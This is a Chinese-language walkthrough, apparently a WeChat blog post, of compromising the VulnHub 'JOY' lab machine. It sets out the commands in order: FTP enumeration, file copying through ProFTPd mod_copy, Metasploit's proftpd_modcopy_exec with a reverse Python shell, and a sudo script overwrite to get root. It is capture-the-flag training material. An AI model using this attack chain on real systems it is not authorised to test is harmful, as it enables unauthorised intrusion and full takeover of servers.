本周实践的是vulnhub的JOY镜像,
下载地址,https://download.vulnhub.com/digitalworld/JOY.7z,
用workstation导入成功,
做地址扫描,sudo netdiscover -r 192.168.131.0/24,
获取到靶机地址是192.168.131.132,
接着做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.131.132,
发现靶机开了21端口的ftp服务,
尝试匿名登录ftp服务,ftp 192.168.131.132,anonymous,
下载到directory文件,
查看文件发现靶机存在/home/patrick/version_control文件,
telnet登录靶机的ftp服务,telnet 192.168.131.132 21,
拷贝version_control文件到ftp的上传目录,
site cpfr /home/patrick/version_control,
site cpto /home/ftp/upload/version_control,
下载version_control文件,查看到ProFTPd: 1.3.5,
以及/var/www/tryingharderisjoy路径信息,
上msfconsole,搜索可漏洞利用的方法,search ProFTPd,
获取到exploit/unix/ftp/proftpd_modcopy_exec,
开始做漏洞利用,use exploit/unix/ftp/proftpd_modcopy_exec,
set RHOSTS 192.168.131.132,
set SITEPATH /var/www/tryingharderisjoy,
set payload payload/cmd/unix/reverse_python,
exploit,获取到反弹shell,转成交互式shell,
python -c 'import pty; pty.spawn("/bin/bash")',
查看到patrick的密码,apollo098765,切换用户,
查看root权限的程序,sudo -l,获取到/home/patrick/script/test,
在kali攻击机上准备一个假的test文件,并上传ftp,
echo "awk 'BEGIN {system("/bin/bash")}'" > test,
再次用telnet登录ftp服务,telnet 192.168.131.132 21,
拷贝test文件到/home/patrick/script/test,
site cpfr /home/ftp/upload/test,
site cpto /home/patrick/script/test,
执行test文件,sudo /home/patrick/script/test,
获取到新的shell,id确认是root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之JOY的实践
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论